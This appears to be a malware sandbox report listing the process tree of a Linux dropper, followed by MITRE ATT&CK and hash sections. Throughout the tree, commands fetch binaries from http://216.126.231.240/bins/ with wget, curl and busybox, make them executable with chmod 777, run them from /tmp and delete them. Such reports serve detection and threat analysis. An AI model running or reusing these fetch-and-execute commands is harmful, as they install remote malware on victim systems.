/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:939
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:941
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:944
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:945
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:947
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:950
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:951
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:953
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:956
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:957
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:959
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:962
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:963
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:965
-
-
/bin/chmodchmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:968
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:969
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:971
-
-
/bin/chmodchmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:974
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:975
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:977
-
-
/bin/chmodchmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:980
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97